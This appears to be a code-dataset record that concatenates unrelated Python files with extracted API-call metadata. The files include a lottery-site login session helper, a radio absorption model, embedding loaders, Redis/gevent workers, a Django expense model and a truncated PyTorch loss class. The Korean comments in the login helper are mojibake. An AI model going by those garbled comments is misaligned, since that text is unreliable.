assert type(password) == str
default_auth_cred = (
self._get_default_auth_cred()
) # JSessionId ๊ฐ์ ๋ฐ์์จ ํ, ๊ทธ ๊ฐ์ ์ธ์ฆ์ ์์ฐ๋ ๋ฐฉ์
headers = self._generate_req_headers(default_auth_cred)
data = self._generate_body(user_id, password)
_res = self._try_login(headers, data) # ์๋ก์ด ๊ฐ์ JSESSIONID๊ฐ ๋ด๋ ค์ค๋๋ฐ, ์ด ๊ฐ์ผ๋ก ๋ก๊ทธ์ธ ์๋จ
self._update_auth_cred(default_auth_cred)
def add_auth_cred_to_headers(self, headers: dict) -> str:
assert type(headers) == dict
copied_headers = copy.deepcopy(headers)
copied_headers["Cookie"] = f"JSESSIONID={self._AUTH_CRED}"
return copied_headers
def _get_default_auth_cred(self):
res = requests.get(
"https://dhlottery.co.kr/gameResult.do?method=byWin&wiselog=H_C_1_1"
)
return self._get_j_session_id_from_response(res)
def _get_j_session_id_from_response(self, res: requests.Response):
assert type(res) == requests.Response
for cookie in res.cookies:
if cookie.name == "JSESSIONID":
return cookie.value
raise KeyError("JSESSIONID cookie is not set in response")
def _generate_req_headers(self, j_session_id: str):
assert type(j_session_id) == str
copied_headers = copy.deepcopy(self._REQ_HEADERS)
copied_headers["Cookie"] = f"JSESSIONID={j_session_id}"
return copied_headers
def _generate_body(self, user_id: str, password: str):
assert type(user_id) == str
assert type(password) == str
return {
"returnUrl": "https://dhlottery.co.kr/common.do?method=main",
"userId": user_id,
"password": password,
"checkSave": "on",
"newsEventYn": "",
}
def _try_login(self, headers: dict, data: dict):
assert type(headers) == dict
assert type(data) == dict
res = requests.post(
"https://www.dhlottery.co.kr/userSsl.do?method=login",
headers=headers,
data=data,
)
return res
def _update_auth_cred(self, j_session_id: str) -> None:
assert type(j_session_id) == str
# TODO: judge whether login is success or not
# ๋ก๊ทธ์ธ ์คํจํด๋ jsession ๊ฐ์ด ๊ฐฑ์ ๋๊ธฐ ๋๋ฌธ์, ๋ง์ดํ์ด์ง ๋ฐฉ๋ฌธ ๋ฑ์ผ๋ก ํ๋จํด์ผ ํ ๋ฏ
# + ๋น๋ฒ 5๋ฒ ํ๋ ธ์ ๊ฒฝ์ฐ์ ๋น๋ฒ ์ ํํด๋ ๋ก๊ทธ์ธ ์คํจํจ
self._AUTH_CRED = j_session_id
|
[
"requests.post",
"copy.deepcopy",
"requests.get"
] |
[((1642, 1664), 'copy.deepcopy', 'copy.deepcopy', (['headers'], {}), '(headers)\n', (1655, 1664), False, 'import copy\n'), ((1815, 1902), 'requests.get', 'requests.get', (['"""https://dhlottery.co.kr/gameResult.do?method=byWin&wiselog=H_C_1_1"""'], {}), "(\n 'https://dhlottery.co.kr/gameResult.do?method=byWin&wiselog=H_C_1_1')\n", (1827, 1902), False, 'import requests\n'), ((2404, 2436), 'copy.deepcopy', 'copy.deepcopy', (['self._REQ_HEADERS'], {}), '(self._REQ_HEADERS)\n', (2417, 2436), False, 'import copy\n'), ((3033, 3133), 'requests.post', 'requests.post', (['"""https://www.dhlottery.co.kr/userSsl.do?method=login"""'], {'headers': 'headers', 'data': 'data'}), "('https://www.dhlottery.co.kr/userSsl.do?method=login',\n headers=headers, data=data)\n", (3046, 3133), False, 'import requests\n')]
|
import math
import os.path
from radiobear.constituents import parameters
# Some constants
T0 = 300.0 # reference temperature in K
AMU_H2O = 18.015
R = 8.314462E7
# Set data arrays
f0 = []
Ei = []
A = []
GH2 = []
GHe = []
GH2O = []
x_H2 = []
x_He = []
x_H2O = []
def readInputFiles(par):
"""If needed this reads in the data files for h2o"""
useLinesUpTo = 10 # index number
global nlin
nlin = 0
if par.verbose:
print("Reading h2o lines")
filename = os.path.join(par.path, 'h2od.lin')
ifp = open(filename, 'r')
for line in ifp:
if nlin >= useLinesUpTo:
break
nlin += 1
data = line.split()
if len(data) == 9:
f0.append(float(data[0]))
Ei.append(float(data[1]))
A.append(float(data[2]))
GH2.append(float(data[3]))
GHe.append(float(data[4]))
GH2O.append(float(data[5]))
x_H2.append(float(data[6]))
x_He.append(float(data[7]))
x_H2O.append(float(data[8]))
else:
break
ifp.close()
if par.verbose:
print(' ' + str(nlin) + ' lines')
return nlin
def alpha(freq, T, P, X, P_dict, other_dict, **kwargs):
# Read in data if needed
par = parameters.setpar(kwargs)
if len(f0) == 0:
readInputFiles(par)
P_h2 = P*X[P_dict['H2']]
P_he = P*X[P_dict['HE']]
P_h2o = P*X[P_dict['H2O']]
n_int = 3.0/2.0
rho = 1.0E12*AMU_H2O*P_h2o/(R*T)
Pa = 0.81*P_h2 + 0.35*P_he
alpha_h2o = []
for f in freq:
f2 = f**2
alpha = 0.0
for i in range(nlin):
gamma = pow((T0/T), x_H2[i])*GH2[i]*P_h2
gamma += pow((T0/T), x_He[i])*GHe[i]*P_he
gamma += pow((T0/T), x_H2O[i])*GH2O[i]*P_h2o
g2 = gamma**2
ITG = A[i]*math.exp(-Ei[i]/T)
shape = gamma/((f0[i]**2 - f2)**2 + 4.0*f2*g2)
alpha += shape*ITG
GR1971 = 1.08E-11*rho*pow((T0/T), 2.1)*Pa*f2
a = 2.0*f2*rho*pow((T0/T), n_int)*alpha/434294.5 + GR1971/434294.5
if par.units == 'dBperkm':
a *= 434294.5
alpha_h2o.append(a)
return alpha_h2o
|
[
"math.exp",
"radiobear.constituents.parameters.setpar"
] |
[((1340, 1365), 'radiobear.constituents.parameters.setpar', 'parameters.setpar', (['kwargs'], {}), '(kwargs)\n', (1357, 1365), False, 'from radiobear.constituents import parameters\n'), ((1933, 1953), 'math.exp', 'math.exp', (['(-Ei[i] / T)'], {}), '(-Ei[i] / T)\n', (1941, 1953), False, 'import math\n')]
|
import re
import gzip
import numpy as np
from zipfile import ZipFile
def load_corpus(corpus_file, load_tags=False):
if corpus_file.endswith('.gz'):
corpus = []
with gzip.open(corpus_file, 'r') as f:
for line in f:
corpus.append(line.decode("utf-8").split())
elif corpus_file.endswith('.conllu'):
corpus = read_conllUD_file(corpus_file, load_tags)
return corpus
def read_conllUD_file(location, load_tags):
sentences = []
tokens = []
with open(location) as f:
for l in f:
if not(l.strip().startswith('#')):
s = l.split('\t')
if len(s) == 10 and not('-' in s[0]):
if load_tags:
tokens.append((s[1], s[3]))
else:
tokens.append(s[1])
elif len(l.strip())==0 and len(tokens) > 0:
sentences.append(tokens)
tokens = []
return enforce_unicode(sentences)
def enforce_unicode(sentences):
"""
In Python3 we should check for str class instead of unicode according to
https://stackoverflow.com/questions/19877306/nameerror-global-name-unicode-is-not-defined-in-python-3
"""
if len(sentences) == 0 or type(sentences[0][0][0]) == str: # if the first token is already unicode, there seems nothing to be done
return sentences
return [[(unicode(t[0], "utf8"), unicode(t[1], "utf8")) for t in s] for s in sentences]
def load_embeddings(filename, max_words=-1):
if filename.endswith('.gz'):
lines = gzip.open(filename)
elif filename.endswith('.zip'):
myzip = ZipFile(filename) # we assume only one embedding file to be included in a zip file
lines = myzip.open(myzip.namelist()[0])
else:
lines = open(filename)
data, words = [], []
for counter, line in enumerate(lines):
if len(words) == max_words:
break
if type(line) == bytes:
try:
line = line.decode("utf-8")
except UnicodeDecodeError:
print('Error at line {}: {}'.format(counter, line))
continue
tokens = line.rstrip().split(' ')
if len(words) == 0 and len(tokens) == 2 and re.match('[1-9][0-9]*', tokens[0]):
# the first line might contain the number of embeddings and dimensionality of the vectors
continue
try:
values = [float(i) for i in tokens[1:]]
if sum([v**2 for v in values]) > 0: # only embeddings with non-zero norm are kept
data.append(values)
words.append(tokens[0])
except:
print('Error while parsing input line #{}: {}'.format(counter, line))
i2w = dict(enumerate(words))
return np.array(data), {v:k for k,v in i2w.items()}, i2w
|
[
"numpy.array",
"zipfile.ZipFile",
"gzip.open",
"re.match"
] |
[((1602, 1621), 'gzip.open', 'gzip.open', (['filename'], {}), '(filename)\n', (1611, 1621), False, 'import gzip\n'), ((2824, 2838), 'numpy.array', 'np.array', (['data'], {}), '(data)\n', (2832, 2838), True, 'import numpy as np\n'), ((187, 214), 'gzip.open', 'gzip.open', (['corpus_file', '"""r"""'], {}), "(corpus_file, 'r')\n", (196, 214), False, 'import gzip\n'), ((1674, 1691), 'zipfile.ZipFile', 'ZipFile', (['filename'], {}), '(filename)\n', (1681, 1691), False, 'from zipfile import ZipFile\n'), ((2287, 2321), 're.match', 're.match', (['"""[1-9][0-9]*"""', 'tokens[0]'], {}), "('[1-9][0-9]*', tokens[0])\n", (2295, 2321), False, 'import re\n')]
|
from flask import (Flask, render_template, jsonify, request, redirect)
import os
import logging
# Get the logger
logger = logging.getLogger()
logger.setLevel(logging.INFO)
#################################################
# Flask Setup
#################################################
application = Flask(__name__)
#################################################
# Routes
#################################################
# create route that renders index.html template
@application.route("/")
def home():
return render_template("index.html")
#################################################
# Run the application
#################################################
# run the app.
if __name__ == "__main__":
# Setting debug to True enables debug output. This line should be
# removed before deploying a production app.
application.debug = True
application.run()
|
[
"flask.render_template",
"flask.Flask",
"logging.getLogger"
] |
[((123, 142), 'logging.getLogger', 'logging.getLogger', ([], {}), '()\n', (140, 142), False, 'import logging\n'), ((304, 319), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (309, 319), False, 'from flask import Flask, render_template, jsonify, request, redirect\n'), ((526, 555), 'flask.render_template', 'render_template', (['"""index.html"""'], {}), "('index.html')\n", (541, 555), False, 'from flask import Flask, render_template, jsonify, request, redirect\n')]
|
# simple text object
from typing import List, Dict
import os
import pdb
import re
from agsearch.textinfo import TextInfo
from agsearch.terminfo import TermInfo
from agsearch.utils import DATA_DIR
from agsearch.utils import PUNCTUATIONS
from greek_accentuation.characters import base
from cltk.stop.greek.stops import STOPS_LIST
from cltk.corpus.greek.alphabet import filter_non_greek
class Text:
def __init__(
self, chunks: List[str], has_chunks: bool, is_clean: bool, text_id: str
):
self.chunks = chunks
self.has_chunks = has_chunks
self.is_clean = is_clean
self.text_id = text_id
self.term_freq: Dict[str, int] = {}
@classmethod
def read_text(cls, path: str) -> str:
txt = None
with open(path, "r", encoding="utf-8") as f:
txt = f.read()
return txt
@classmethod
def to_lower(cls, txt: str) -> str:
return txt.lower()
@classmethod
def remove_stop_words(cls, txt: str) -> str:
"remove stop words starting from longer"
text = txt
slist = STOPS_LIST.copy()
slist.sort(key=lambda x: len(x), reverse=True)
for word in slist:
text = text.replace(word, " ")
return text
@classmethod
def remove_punk(cls, txt: str) -> str:
""
text = txt
for punk in PUNCTUATIONS:
text = text.replace(punk, " ")
return text
@classmethod
def remove_accent(cls, txt: str) -> str:
"remove accents from chars"
txts: List[str] = []
for t in txt:
tclean = base(t)
txts.append(tclean)
return "".join(txts)
@classmethod
def remove_non_greek(cls, txt: str) -> str:
""
return filter_non_greek(txt)
@classmethod
def remove_multiple_space(cls, txt: str):
""
return re.sub(r"\s+", " ", txt)
@classmethod
def clean_chunk(cls, txt: str):
txt = cls.remove_non_greek(txt)
return cls.remove_multiple_space(txt)
@classmethod
def clean_text(cls, text: str) -> str:
txt = cls.to_lower(text)
txt = cls.remove_stop_words(txt)
txt = cls.remove_punk(txt)
txt = cls.remove_accent(txt)
return txt
@classmethod
def get_terms(cls, chunks: List[str], sep: str) -> Dict[str, int]:
""
terms: Dict[str, int] = {}
for chunk in chunks:
chunk_terms = [t.strip() for t in chunk.split(sep) if t]
for t in chunk_terms:
if t in terms:
terms[t] += 1
else:
terms[t] = 1
return terms
@classmethod
def from_info(cls, info: TextInfo, chunk_sep: str = " "):
"create text from text info"
text_id = info.text_id
text_path = os.path.join(DATA_DIR, info.local_path)
text = cls.read_text(text_path)
text = cls.clean_text(text)
terms: Dict[str, int] = {}
chunks: List[str] = []
if info.has_chunks:
chunks = text.split(info.chunk_separator)
chunks = [cls.clean_chunk(c) for c in chunks if c]
terms = cls.get_terms(chunks, chunk_sep)
else:
chunks = [text]
chunks = [cls.clean_chunk(c) for c in chunks if c]
terms = cls.get_terms(chunks, chunk_sep)
#
text_obj = Text(
chunks=chunks, has_chunks=info.has_chunks, is_clean=True, text_id=text_id
)
text_obj.term_freq = terms
return text_obj
def to_doc_counts(self) -> Dict[str, Dict[str, int]]:
""
term_doc_id_counts: Dict[str, Dict[str, int]] = {}
for term, count in self.term_freq.items():
doc_id_count = {self.text_id: count}
term_doc_id_counts[term] = doc_id_count
return term_doc_id_counts
|
[
"os.path.join",
"cltk.stop.greek.stops.STOPS_LIST.copy",
"greek_accentuation.characters.base",
"re.sub",
"cltk.corpus.greek.alphabet.filter_non_greek"
] |
[((1093, 1110), 'cltk.stop.greek.stops.STOPS_LIST.copy', 'STOPS_LIST.copy', ([], {}), '()\n', (1108, 1110), False, 'from cltk.stop.greek.stops import STOPS_LIST\n'), ((1776, 1797), 'cltk.corpus.greek.alphabet.filter_non_greek', 'filter_non_greek', (['txt'], {}), '(txt)\n', (1792, 1797), False, 'from cltk.corpus.greek.alphabet import filter_non_greek\n'), ((1888, 1912), 're.sub', 're.sub', (['"""\\\\s+"""', '""" """', 'txt'], {}), "('\\\\s+', ' ', txt)\n", (1894, 1912), False, 'import re\n'), ((2855, 2894), 'os.path.join', 'os.path.join', (['DATA_DIR', 'info.local_path'], {}), '(DATA_DIR, info.local_path)\n', (2867, 2894), False, 'import os\n'), ((1615, 1622), 'greek_accentuation.characters.base', 'base', (['t'], {}), '(t)\n', (1619, 1622), False, 'from greek_accentuation.characters import base\n')]
|
import gevent
import gevent.queue
from establishment.misc.command_processor import BaseProcessor
from establishment.misc.threading_helper import ThreadHandler
from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, \
redis_response_to_json
class GreenletWorker(gevent.Greenlet):
def __init__(self, logger=None, context=None):
gevent.Greenlet.__init__(self)
self.running = False
self.logger = logger
self.context = context
def _run(self):
self.running = True
self.init()
while self.running:
try:
self.tick()
gevent.sleep(0)
except Exception:
self.log_exception("Error in worker " + str(self.__class__.__name__))
self.cleanup()
self.init()
def init(self):
pass
def cleanup(self):
pass
def tick(self):
pass
def stop(self):
self.running = False
def log_exception(self, message):
if self.logger:
self.logger.exception(message)
def log_error(self, message):
if self.logger:
self.logger.error(message)
class GreenletQueueWorker(GreenletWorker):
def __init__(self, job_queue=None, result_queue=None, logger=None, context=None):
super().__init__(logger=logger, context=context)
self.job_queue = job_queue
self.result_queue = result_queue
def tick(self):
try:
command = self.job_queue.get(timeout=1)
except gevent.queue.Empty:
return
result = self.process_command(command)
if result:
self.result_queue.put(result)
def process_command(self, command):
return None
class GreenletRedisQueueListener(GreenletQueueWorker):
def __init__(self, job_queue, redis_queue_name, redis_connection=None, logger=None, context=None,
job_queue_max_size=1024, bulk_size=128):
super().__init__(job_queue=job_queue, logger=logger, context=context)
self.redis_queue_name = redis_queue_name
self.redis_queue = None
self.redis_connection = redis_connection
self.job_queue_max_size = job_queue_max_size
self.bulk_size = bulk_size
self.activate_bulk_retrieval = False
def init(self):
if not self.redis_queue:
self.redis_queue = RedisQueue(self.redis_queue_name, connection=self.redis_connection)
def cleanup(self):
self.redis_queue = None
def tick(self):
if self.job_queue.qsize() >= self.job_queue_max_size:
gevent.sleep(0.5)
return
if self.activate_bulk_retrieval:
jobs = self.redis_queue.bulk_pop(self.bulk_size)
if len(jobs) == 0:
self.activate_bulk_retrieval = False
else:
job = self.redis_queue.pop(timeout=1)
if job:
self.activate_bulk_retrieval = True
jobs = [job]
for job in jobs:
job = redis_response_to_json(job)
if job:
self.job_queue.put(job)
class GreenletRedisStreamListener(GreenletQueueWorker):
def __init__(self, job_queue, redis_stream_name, logger=None, context=None):
super().__init__(job_queue=job_queue, logger=logger, context=context)
self.redis_stream_name = redis_stream_name
self.redis_stream_subscriber = None
def init(self):
if not self.redis_stream_subscriber:
self.redis_stream_subscriber = RedisStreamSubscriber()
self.redis_stream_subscriber.subscribe(self.redis_stream_name)
def cleanup(self):
self.redis_stream_subscriber = None
def tick(self):
message, stream_name = self.redis_stream_subscriber.next_message()
message = redis_response_to_json(message)
if message:
self.job_queue.put(message)
class GreenletRedisStreamPublisher(GreenletQueueWorker):
def __init__(self, result_queue, redis_stream_name, logger=None, context=None):
super().__init__(result_queue=result_queue, logger=logger, context=context)
self.redis_stream_name = redis_stream_name
self.redis_stream_publisher = None
def init(self):
if not self.redis_stream_publisher:
self.redis_stream_publisher = RedisStreamPublisher(self.redis_stream_name, raw=True)
def cleanup(self):
self.redis_stream_publisher = None
def tick(self):
try:
result = self.result_queue.get(timeout=1)
except gevent.queue.Empty:
return
if not result:
return
self.redis_stream_publisher.publish_json(result)
class GreenletRedisQueueCommandProcessor(BaseProcessor):
def __init__(self, logger_name, WorkerClass, redis_queue_name_in, redis_stream_name_out=None, num_workers=10,
job_queue_max_size=1024):
super().__init__(logger_name=logger_name)
self.workers = []
self.job_queue = None
self.result_queue = None
self.num_workers = num_workers
self.job_queue_max_size = job_queue_max_size
self.redis_queue_name_in = redis_queue_name_in
self.redis_stream_name_out = redis_stream_name_out
self.WorkerClass = WorkerClass
self.worker_context = None
def main(self):
self.workers = []
self.job_queue = gevent.queue.Queue()
self.result_queue = gevent.queue.Queue()
self.workers.append(GreenletRedisQueueListener(job_queue=self.job_queue, logger=self.logger,
redis_queue_name=self.redis_queue_name_in,
job_queue_max_size=self.job_queue_max_size))
if self.redis_stream_name_out:
self.workers.append(GreenletRedisStreamPublisher(result_queue=self.result_queue, logger=self.logger,
redis_stream_name=self.redis_stream_name_out))
for i in range(self.num_workers):
self.workers.append(self.WorkerClass(job_queue=self.job_queue, result_queue=self.result_queue,
logger=self.logger, context=self.worker_context))
for worker in self.workers:
worker.start()
gevent.joinall(self.workers)
self.workers = []
self.job_queue = None
self.result_queue = None
self.logger.info("Gracefully stopped to process commands " + str(self.__class__.__name__))
def start(self):
self.background_thread = ThreadHandler("Command processor " + str(self.__class__.__name__), self.process,
daemon=False)
def stop(self):
super().stop()
for worker in self.workers:
worker.stop()
|
[
"establishment.funnel.redis_stream.RedisQueue",
"establishment.funnel.redis_stream.RedisStreamSubscriber",
"establishment.funnel.redis_stream.RedisStreamPublisher",
"establishment.funnel.redis_stream.redis_response_to_json",
"gevent.Greenlet.__init__",
"gevent.sleep",
"gevent.queue.Queue",
"gevent.joinall"
] |
[((392, 422), 'gevent.Greenlet.__init__', 'gevent.Greenlet.__init__', (['self'], {}), '(self)\n', (416, 422), False, 'import gevent\n'), ((3877, 3908), 'establishment.funnel.redis_stream.redis_response_to_json', 'redis_response_to_json', (['message'], {}), '(message)\n', (3899, 3908), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((5468, 5488), 'gevent.queue.Queue', 'gevent.queue.Queue', ([], {}), '()\n', (5486, 5488), False, 'import gevent\n'), ((5517, 5537), 'gevent.queue.Queue', 'gevent.queue.Queue', ([], {}), '()\n', (5535, 5537), False, 'import gevent\n'), ((6420, 6448), 'gevent.joinall', 'gevent.joinall', (['self.workers'], {}), '(self.workers)\n', (6434, 6448), False, 'import gevent\n'), ((2439, 2506), 'establishment.funnel.redis_stream.RedisQueue', 'RedisQueue', (['self.redis_queue_name'], {'connection': 'self.redis_connection'}), '(self.redis_queue_name, connection=self.redis_connection)\n', (2449, 2506), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((2658, 2675), 'gevent.sleep', 'gevent.sleep', (['(0.5)'], {}), '(0.5)\n', (2670, 2675), False, 'import gevent\n'), ((3086, 3113), 'establishment.funnel.redis_stream.redis_response_to_json', 'redis_response_to_json', (['job'], {}), '(job)\n', (3108, 3113), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((3595, 3618), 'establishment.funnel.redis_stream.RedisStreamSubscriber', 'RedisStreamSubscriber', ([], {}), '()\n', (3616, 3618), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((4397, 4451), 'establishment.funnel.redis_stream.RedisStreamPublisher', 'RedisStreamPublisher', (['self.redis_stream_name'], {'raw': '(True)'}), '(self.redis_stream_name, raw=True)\n', (4417, 4451), False, 'from establishment.funnel.redis_stream import RedisStreamPublisher, RedisStreamSubscriber, RedisQueue, redis_response_to_json\n'), ((672, 687), 'gevent.sleep', 'gevent.sleep', (['(0)'], {}), '(0)\n', (684, 687), False, 'import gevent\n')]
|
#!/usr/bin/python
import setuptools
from setuptools import setup, find_packages
install_requires = [
'cmdln',
'SQLAlchemy == 0.5.5'
]
extras_require = {
'ldap' : 'python-ldap',
'postgres' : 'psycopg2'
}
setup(name='Mothership',
author='Gilt SA team',
author_email='<EMAIL>',
description='Mothership - asset managment',
packages=find_packages(),
scripts=['ship',
'ship_readonly'
],
url='http://mothership.sf.net',
version='0.0.28',
)
|
[
"setuptools.find_packages"
] |
[((381, 396), 'setuptools.find_packages', 'find_packages', ([], {}), '()\n', (394, 396), False, 'from setuptools import setup, find_packages\n')]
|
# coding=utf-8
from django.contrib.auth.models import User
from django.db import models
from modules.dict_table.models import ExpenseType
from modules.employee_management.employee_info.models import Employee
from modules.project_manage.models import Project
APPLY_STATUS_CHOICES = (
('1', u'ๅพ
ๅฎกๆน'),
('2', u'้่ฟ'),
('3', u'ๆ็ป'),
)
INOROUT_CHOICES = (
('1', u'ๆฏๅบ'),
('2', u'ๆถๅ
ฅ'),
)
class Expense(models.Model):
"""่ดน็จไฟกๆฏ """
emplyid = models.ForeignKey(Employee, verbose_name=u"ๅๅทฅ็ผๅท", related_name="expense_emp", blank=True, null=True)
projectid = models.ForeignKey(Project, verbose_name=u"้กน็ฎๅ็งฐ", related_name="expense_project", blank=True,
null=True)
userid = models.ForeignKey(User, verbose_name=u"่ดน็จ่ด่ดฃไบบ", related_name="expense_user", blank=True, null=True)
expensetype = models.ForeignKey(ExpenseType, verbose_name=u"่ดน็จ็ฑปๅ", blank=True, null=True)
inorout = models.CharField(u"ๆถๆฏ็ฑปๅ", max_length=100, choices=INOROUT_CHOICES, default='1')
note = models.CharField(u"็ณ่ฏท่ฏดๆ", max_length=100)
apply_user = models.ForeignKey(User, verbose_name=u"็ณ่ฏทไบบ")
created = models.DateTimeField(u"็ณ่ฏทๆถ้ด", auto_now_add=True)
handle_user = models.CharField(u"ๅฎกๆนไบบ", max_length=100, blank=True)
handle_date = models.DateTimeField(u"ๅฎกๆนๆถ้ด", blank=True, null=True)
reason = models.CharField(u"ๅฎกๆนๅๅค", max_length=100, blank=True)
status = models.CharField(u"ๅฎกๆน็ถๆ", max_length=100, choices=APPLY_STATUS_CHOICES, default='1')
remark1 = models.CharField(u"ๅคๆณจ1", max_length=256, blank=True)
remark2 = models.CharField(u"ๅคๆณจ2", max_length=256, blank=True)
remark3 = models.CharField(u"ๅคๆณจ3", max_length=256, blank=True)
remark4 = models.CharField(u"ๅคๆณจ4", max_length=256, blank=True)
remark5 = models.CharField(u"ๅคๆณจ5", max_length=256, blank=True)
def __str__(self):
return self.emplyid
class Meta:
verbose_name = u"่ดน็จไฟกๆฏ"
ordering = ['-id'] # idๅๅ
index_together = ["emplyid", "projectid"] # ็ดขๅผๅญๆฎต็ปๅ
permissions = (
("browse_expense", u"ๆต่ง ่ดน็จไฟกๆฏ"),
)
def get_absolute_url(self):
return "/expense/list"
|
[
"django.db.models.ForeignKey",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] |
[((437, 542), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Employee'], {'verbose_name': 'u"""ๅๅทฅ็ผๅท"""', 'related_name': '"""expense_emp"""', 'blank': '(True)', 'null': '(True)'}), "(Employee, verbose_name=u'ๅๅทฅ็ผๅท', related_name=\n 'expense_emp', blank=True, null=True)\n", (454, 542), False, 'from django.db import models\n'), ((551, 659), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Project'], {'verbose_name': 'u"""้กน็ฎๅ็งฐ"""', 'related_name': '"""expense_project"""', 'blank': '(True)', 'null': '(True)'}), "(Project, verbose_name=u'้กน็ฎๅ็งฐ', related_name=\n 'expense_project', blank=True, null=True)\n", (568, 659), False, 'from django.db import models\n'), ((696, 798), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'verbose_name': 'u"""่ดน็จ่ด่ดฃไบบ"""', 'related_name': '"""expense_user"""', 'blank': '(True)', 'null': '(True)'}), "(User, verbose_name=u'่ดน็จ่ด่ดฃไบบ', related_name='expense_user',\n blank=True, null=True)\n", (713, 798), False, 'from django.db import models\n'), ((810, 885), 'django.db.models.ForeignKey', 'models.ForeignKey', (['ExpenseType'], {'verbose_name': 'u"""่ดน็จ็ฑปๅ"""', 'blank': '(True)', 'null': '(True)'}), "(ExpenseType, verbose_name=u'่ดน็จ็ฑปๅ', blank=True, null=True)\n", (827, 885), False, 'from django.db import models\n'), ((897, 976), 'django.db.models.CharField', 'models.CharField', (['u"""ๆถๆฏ็ฑปๅ"""'], {'max_length': '(100)', 'choices': 'INOROUT_CHOICES', 'default': '"""1"""'}), "(u'ๆถๆฏ็ฑปๅ', max_length=100, choices=INOROUT_CHOICES, default='1')\n", (913, 976), False, 'from django.db import models\n'), ((985, 1026), 'django.db.models.CharField', 'models.CharField', (['u"""็ณ่ฏท่ฏดๆ"""'], {'max_length': '(100)'}), "(u'็ณ่ฏท่ฏดๆ', max_length=100)\n", (1001, 1026), False, 'from django.db import models\n'), ((1041, 1085), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'verbose_name': 'u"""็ณ่ฏทไบบ"""'}), "(User, verbose_name=u'็ณ่ฏทไบบ')\n", (1058, 1085), False, 'from django.db import models\n'), ((1097, 1145), 'django.db.models.DateTimeField', 'models.DateTimeField', (['u"""็ณ่ฏทๆถ้ด"""'], {'auto_now_add': '(True)'}), "(u'็ณ่ฏทๆถ้ด', auto_now_add=True)\n", (1117, 1145), False, 'from django.db import models\n'), ((1161, 1213), 'django.db.models.CharField', 'models.CharField', (['u"""ๅฎกๆนไบบ"""'], {'max_length': '(100)', 'blank': '(True)'}), "(u'ๅฎกๆนไบบ', max_length=100, blank=True)\n", (1177, 1213), False, 'from django.db import models\n'), ((1229, 1281), 'django.db.models.DateTimeField', 'models.DateTimeField', (['u"""ๅฎกๆนๆถ้ด"""'], {'blank': '(True)', 'null': '(True)'}), "(u'ๅฎกๆนๆถ้ด', blank=True, null=True)\n", (1249, 1281), False, 'from django.db import models\n'), ((1292, 1345), 'django.db.models.CharField', 'models.CharField', (['u"""ๅฎกๆนๅๅค"""'], {'max_length': '(100)', 'blank': '(True)'}), "(u'ๅฎกๆนๅๅค', max_length=100, blank=True)\n", (1308, 1345), False, 'from django.db import models\n'), ((1356, 1444), 'django.db.models.CharField', 'models.CharField', (['u"""ๅฎกๆน็ถๆ"""'], {'max_length': '(100)', 'choices': 'APPLY_STATUS_CHOICES', 'default': '"""1"""'}), "(u'ๅฎกๆน็ถๆ', max_length=100, choices=APPLY_STATUS_CHOICES,\n default='1')\n", (1372, 1444), False, 'from django.db import models\n'), ((1452, 1504), 'django.db.models.CharField', 'models.CharField', (['u"""ๅคๆณจ1"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'ๅคๆณจ1', max_length=256, blank=True)\n", (1468, 1504), False, 'from django.db import models\n'), ((1516, 1568), 'django.db.models.CharField', 'models.CharField', (['u"""ๅคๆณจ2"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'ๅคๆณจ2', max_length=256, blank=True)\n", (1532, 1568), False, 'from django.db import models\n'), ((1580, 1632), 'django.db.models.CharField', 'models.CharField', (['u"""ๅคๆณจ3"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'ๅคๆณจ3', max_length=256, blank=True)\n", (1596, 1632), False, 'from django.db import models\n'), ((1644, 1696), 'django.db.models.CharField', 'models.CharField', (['u"""ๅคๆณจ4"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'ๅคๆณจ4', max_length=256, blank=True)\n", (1660, 1696), False, 'from django.db import models\n'), ((1708, 1760), 'django.db.models.CharField', 'models.CharField', (['u"""ๅคๆณจ5"""'], {'max_length': '(256)', 'blank': '(True)'}), "(u'ๅคๆณจ5', max_length=256, blank=True)\n", (1724, 1760), False, 'from django.db import models\n')]
|
import torch
import torch.nn as nn
import torch.nn.functional as F
from losses.bilinear_sampler import apply_disparity
from .ssim import ssim_gauss, ssim_godard
class BaseGeneratorLoss(nn.modules.Module):
def __init__(self, args):
super(BaseGeneratorLoss, self).__init__()
self.which_ssim = args.which_ssim
self.ssim_window_size = args.ssim_window_size
def scale_pyramid(self, img, num_scales):
scaled_imgs = [img]
s = img.size()
h = s[2]
w = s[3]
for i in range(num_scales - 1):
ratio = 2 ** (i + 1)
nh = h // ratio
nw = w // ratio
scaled_imgs.append(nn.functional.interpolate(img, [nh, nw], mode='bilinear', align_corners=False))
return scaled_imgs
def gradient_x(self, img):
# Pad input to keep output size consistent
img = F.pad(img, (0, 1, 0, 0), mode="replicate")
gx = img[:, :, :, :-1] - img[:, :, :, 1:] # NCHW
return gx
def gradient_y(self, img):
# Pad input to keep output size consistent
img = F.pad(img, (0, 0, 0, 1), mode="replicate")
gy = img[:, :, :-1, :] - img[:, :, 1:, :] # NCHW
return gy
def generate_image_left(self, img, disp):
return apply_disparity(img, -disp)
def generate_image_right(self, img, disp):
return apply_disparity(img, disp)
def SSIM(self, x, y):
if self.which_ssim == 'godard':
return ssim_godard(x, y)
elif self.which_ssim == 'gauss':
return ssim_gauss(x, y, window_size=self.ssim_window_size)
else:
raise ValueError('{} version not implemented'.format(self.which_ssim))
def disp_smoothness(self, disp, pyramid):
disp_gradients_x = [self.gradient_x(d) for d in disp]
disp_gradients_y = [self.gradient_y(d) for d in disp]
